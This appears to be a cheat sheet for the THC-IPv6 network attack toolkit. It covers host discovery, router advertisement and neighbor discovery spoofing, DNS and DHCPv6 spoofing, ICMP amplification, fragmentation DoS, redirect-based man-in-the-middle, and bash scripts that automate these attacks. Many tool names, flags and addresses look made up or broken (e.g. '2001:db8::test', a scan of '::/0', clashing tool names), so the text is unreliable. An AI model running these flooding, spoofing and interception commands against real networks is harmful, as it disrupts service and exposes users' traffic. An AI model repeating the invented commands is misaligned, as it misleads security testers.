Overview
THC-IPv6 is a comprehensive toolkit for IPv6 network security testing and vulnerability assessment. It provides advanced tools for IPv6 reconnaissance, neighbor discovery manipulation, address scanning, and exploit delivery. This toolkit is essential for authorized security professionals testing IPv6 network implementations, identifying configuration weaknesses, and validating security controls in modern dual-stack environments.
Installation
Prerequisites
# Required packages
sudo apt-get update
sudo apt-get install build-essential libpcap-dev libssl-dev
# Git for cloning
sudo apt-get install git
From GitHub
git clone https://github.com/vanhauser-thc/thc-ipv6.git
cd thc-ipv6
# Build toolkit
make
# Install globally (optional)
sudo make install
Manual Installation
# Download source
wget https://www.thc.org/thc-ipv6-3.8.tar.gz
tar -xzf thc-ipv6-3.8.tar.gz
cd thc-ipv6
# Compile
./configure
make
sudo make install
Verify Installation
# List available tools
ls thc-ipv6-*
# Check specific tool
./thc-ipv6-address-scan --help
| Tool | Function |
|---|
address-scan | IPv6 address scanning and discovery |
alive6 | Detect alive IPv6 hosts |
dnsdict6 | DNS enumeration for IPv6 |
dnsspoofx | IPv6 DNS spoofing |
fake-advertise6 | Router advertisement spoofing |
flood-router6 | Router advertisement flooding |
nd6 | Neighbor discovery manipulation |
packetgen6 | Custom IPv6 packet generation |
rsmurf6 | Reflection DDoS testing |
smurf6 | IPv6 ICMP amplification |
toobig6 | Fragmentation bomb attacks |
Network Reconnaissance
Detect IPv6 Hosts
# Scan local network for IPv6
./alive6 eth0
# Scan specific range
./alive6 -p eth0 fe80::/10
# Output to file
./alive6 eth0 > hosts.txt
Address Scanning
# Scan IPv6 address range
./address-scan eth0 2001:db8::/32
# Fast scan mode
./address-scan -s eth0 2001:db8::/32
# Verbose output
./address-scan -v eth0 2001:db8::/32
# Save results
./address-scan eth0 2001:db8::/32 > ipv6_addresses.txt
DNS Enumeration
# Enumerate IPv6 DNS records
./dnsdict6 -d example.com
# Use wordlist
./dnsdict6 -w wordlist.txt example.com
# Reverse DNS lookup
./dnsdict6 -i 2001:db8::/32
# Full scan mode
./dnsdict6 -f -d example.com
| Scan Type | Command |
|---|
| Active scan | address-scan eth0 range |
| Alive detection | alive6 eth0 |
| DNS enumeration | dnsdict6 -d domain |
| Reverse lookup | dnsdict6 -i range |
Neighbor Discovery Testing
Neighbor Discovery Manipulation
# Send neighbor discovery packets
./nd6 -i fe80::1 eth0 2001:db8::1
# Solicitation injection
./nd6 -ns eth0 2001:db8::/64
# Advertisement injection
./nd6 -na eth0 2001:db8::/64
Router Advertisement Attacks
# Fake router advertisement
./fake-advertise6 eth0 2001:db8::/64
# Flood network with RA
./flood-router6 eth0
# Router advertisement with payload
./fake-advertise6 -e eth0 2001:db8::/64
Duplicate Address Detection
# Test DAD mechanism
./nd6 -dad eth0 2001:db8::1
# Verify DAD responses
./alive6 eth0 | grep -i "duplicate"
| Attack | Command |
|---|
| Neighbor spoofing | ./nd6 -i |
| Router advertisement | ./fake-advertise6 |
| RA flooding | ./flood-router6 |
| Address conflict | ./nd6 -dad |
ICMP-Based Attacks
ICMP Amplification Testing
# Test ICMP echo amplification
./smurf6 eth0 target_ipv6
# Multicast amplification
./smurf6 -m eth0 2001:db8::1
# Verify amplification potential
./alive6 eth0 ff02::1
Fragmentation Attacks
# Send oversized packets
./toobig6 -H eth0 target_ipv6
# Fragment reassembly test
./toobig6 eth0 2001:db8::1
# Heap overflow test
./toobig6 -s eth0 2001:db8::1
ICMPv6 Redirect
# Send ICMPv6 redirect
./redirect6 eth0 2001:db8::1 2001:db8::2
# Gateway manipulation
./fake-router6 -r eth0 2001:db8::/64
| ICMP Attack | Command |
|---|
| Smurf attack | ./smurf6 eth0 target |
| TooBig attack | ./toobig6 eth0 target |
| Redirect | ./redirect6 eth0 target gate |
Packet Crafting and Injection
Custom Packet Generation
# Generate custom IPv6 packet
./packetgen6 eth0 \
--src 2001:db8::1 \
--dst 2001:db8::2 \
--proto tcp \
--payload "test"
# Raw packet crafting
./sendpkt6 eth0 2001:db8::1 2001:db8::2
Protocol-Specific Testing
# ICMPv6 packet
./packetgen6 eth0 --icmpv6 --type echo-request
# TCP packet
./packetgen6 eth0 --tcp --port 80
# UDP packet
./packetgen6 eth0 --udp --port 53
DNS Spoofing
DNS Spoofing Attacks
# Start DNS spoof server
./dnsspoofx eth0 example.com 2001:db8::1
# Targeted DNS poison
./dnsspoofx -t 2001:db8::100 eth0 example.com 2001:db8::1
# Wildcard DNS spoofing
./dnsspoofx eth0 '*.example.com' 2001:db8::1
DHCP Spoofing (DHCPv6)
# Send rogue DHCPv6 server
./fake-dhcp6 eth0 2001:db8::/64
# DHCPv6 information request
./fake-dhcp6 -i eth0 2001:db8::1
Practical Workflow Examples
IPv6 Network Assessment
# 1. Detect IPv6 hosts
./alive6 eth0
# 2. Enumerate addresses in range
./address-scan eth0 2001:db8::/32
# 3. Scan for DNS entries
./dnsdict6 -d example.com
# 4. Test neighbor discovery
./nd6 -i fe80::1 eth0 2001:db8::1
# 5. Check ICMP behavior
./alive6 eth0 ff02::1
Security Testing Workflow
#!/bin/bash
INTERFACE="eth0"
TARGET_RANGE="2001:db8::/32"
echo "[*] Starting IPv6 security assessment..."
# Phase 1: Discovery
echo "[*] Phase 1: Host Discovery"
./alive6 "$INTERFACE" > hosts.txt
# Phase 2: Address Enumeration
echo "[*] Phase 2: Address Enumeration"
./address-scan "$INTERFACE" "$TARGET_RANGE" > addresses.txt
# Phase 3: DNS Enumeration
echo "[*] Phase 3: DNS Enumeration"
./dnsdict6 -d example.com > dns_results.txt
# Phase 4: Vulnerability Testing
echo "[*] Phase 4: Vulnerability Testing"
# Test RA floods
./flood-router6 "$INTERFACE" &
sleep 10
pkill -f "flood-router6"
# Phase 5: Reporting
echo "[*] Assessment Complete"
echo "Results saved to: hosts.txt, addresses.txt, dns_results.txt"
Denial of Service Testing
# Router advertisement flood (controlled)
timeout 60 ./flood-router6 eth0
# ICMPv6 amplification (test environment)
./smurf6 eth0 target_ipv6 &
sleep 30
pkill -f "smurf6"
# Fragmentation bomb
./toobig6 eth0 target_ipv6
IPv6 Network Hardening Validation
#!/bin/bash
INTERFACE="eth0"
echo "[*] IPv6 Security Validation"
# Test 1: Router Advertisement Guard
echo "[Test 1] Testing Router Advertisement Guard..."
./fake-advertise6 "$INTERFACE" 2001:db8::/64
# Test 2: ICMP Rate Limiting
echo "[Test 2] Testing ICMP Rate Limiting..."
./alive6 -R "$INTERFACE" | head -20
# Test 3: DAD Functionality
echo "[Test 3] Duplicate Address Detection..."
./nd6 -dad "$INTERFACE" 2001:db8::test
# Test 4: ND Inspection
echo "[Test 4] Neighbor Discovery Inspection..."
./nd6 -ns "$INTERFACE"
echo "[*] Validation Complete"
Advanced Exploitation
Redirect-Based MITM
# Configure forwarding
sudo sysctl -w net.ipv6.conf.all.forwarding=1
# Send redirect packets
./redirect6 eth0 target_ipv6 gateway_ipv6
# Monitor traffic
tcpdump -i eth0 -n icmpv6
Router Advertisement Spoofing
# Send malicious RA
./fake-advertise6 \
--prefix 2001:db8::/64 \
--lifetime 3600 \
--mtu 1280 \
eth0
# Persistent RA generation
while true; do
./fake-advertise6 eth0 2001:db8::/64
sleep 10
done
Neighbor Discovery Poisoning
# ARP-equivalent for IPv6
./nd6 -i fe80::1 eth0 2001:db8::1
# Multiple spoofed neighbors
for i in {1..10}; do
./nd6 -i fe80::$i eth0 2001:db8::$i &
done
Automation and Scripting
Comprehensive Scan Script
#!/bin/bash
TARGET_NETWORK=$1
INTERFACE=${2:-eth0}
OUTPUT_DIR="ipv6_scan_$(date +%Y%m%d_%H%M%S)"
mkdir -p "$OUTPUT_DIR"
echo "[*] IPv6 Comprehensive Scan"
echo "[*] Network: $TARGET_NETWORK"
echo "[*] Interface: $INTERFACE"
echo "[*] Output: $OUTPUT_DIR"
# Host discovery
./alive6 "$INTERFACE" > "$OUTPUT_DIR/alive_hosts.txt"
# Address enumeration
./address-scan "$INTERFACE" "$TARGET_NETWORK" > "$OUTPUT_DIR/all_addresses.txt"
# DNS enumeration
./dnsdict6 -d "$(echo $TARGET_NETWORK | cut -d: -f1-2).org" > "$OUTPUT_DIR/dns_records.txt"
# Generate report
cat > "$OUTPUT_DIR/report.txt" << EOF
IPv6 Security Assessment Report
Generated: $(date)
Target Network: $TARGET_NETWORK
Interface: $INTERFACE
Findings:
- Alive hosts: $(wc -l < $OUTPUT_DIR/alive_hosts.txt)
- Total addresses: $(wc -l < $OUTPUT_DIR/all_addresses.txt)
- DNS entries: $(wc -l < $OUTPUT_DIR/dns_records.txt)
EOF
echo "[*] Scan complete. Results in: $OUTPUT_DIR"
Vulnerability Detection Script
#!/bin/bash
INTERFACE=$1
echo "[*] IPv6 Vulnerability Detection"
# Test 1: RA Guard bypass
echo "[Test 1] Router Advertisement Guard..."
./fake-advertise6 "$INTERFACE" 2001:db8::/64 2>/dev/null
[ $? -eq 0 ] && echo "WARNING: RA Guard may be bypassed"
# Test 2: ICMP rate limiting
echo "[Test 2] ICMP Rate Limiting..."
for i in {1..100}; do
./alive6 "$INTERFACE" > /dev/null 2>&1
done
# Test 3: Neighbor Discovery security
echo "[Test 3] Neighbor Discovery Security..."
./nd6 -i fe80::ffff "$INTERFACE" 2001:db8::1 2>/dev/null
# Test 4: DNS security
echo "[Test 4] DNSSEC Validation..."
./dnsdict6 -d example.com 2>/dev/null
echo "[*] Testing complete"
Common Use Cases
Dual-Stack Migration Validation
# Verify IPv6 is enabled
./alive6 eth0
# Check address assignment
./address-scan eth0 ::/0
# Validate AAAA records
./dnsdict6 -d example.com
# Test dual-stack routing
./packetgen6 eth0 --icmpv6
IPv6 Network Documentation
# Discover all devices
./alive6 eth0 > network_devices.txt
# Map IPv6 topology
./address-scan eth0 2001:db8::/32 > ipv6_topology.txt
# Document DNS infrastructure
./dnsdict6 -d example.com > dns_infrastructure.txt
Security Hardening Verification
# Test RA Guard
./fake-advertise6 eth0 2001:db8::/64
# Test ICMP filtering
./alive6 eth0 ff02::1
# Test DHCP snooping
./fake-dhcp6 eth0 2001:db8::/64
# Verify firewall rules
./packetgen6 eth0 --tcp --port 22
Troubleshooting
# Check installation directory
ls -la thc-ipv6-*/
# Add to PATH
export PATH=$PATH:$(pwd)/thc-ipv6-*
# Or use full path
./thc-ipv6-address-scan eth0 ::/0
Permission Issues
# Most tools require raw socket access
sudo ./alive6 eth0
# Or use setcap
sudo setcap cap_net_raw+ep ./address-scan
No Output Detected
# Verify interface
ip -6 link show
# Check IPv6 is enabled
cat /proc/sys/net/ipv6/conf/all/disable_ipv6
# Enable IPv6 if needed
sudo sysctl -w net.ipv6.conf.all.disable_ipv6=0
Slow Scanning
# Use fast scan mode where available
./address-scan -s eth0 2001:db8::/32
# Reduce scope
./address-scan eth0 2001:db8:1::/48 # Smaller range
# Increase timeout
./alive6 -T 2 eth0
Security Considerations
Authorized Testing Only
- Ensure written authorization before testing
- Document all testing activities
- Follow responsible disclosure
- Maintain confidentiality of findings
Safe Testing Practices
# Test in controlled environment
# Use isolated network segments
# Limit test scope and duration
# Monitor for unintended impacts
# Have rollback procedures ready
- Wireshark — IPv6 packet analysis
- Zeek — IPv6 network monitoring
- Suricata — IPv6 intrusion detection
- scapy — Python IPv6 packet crafting
- hping3 — IPv6 packet generator
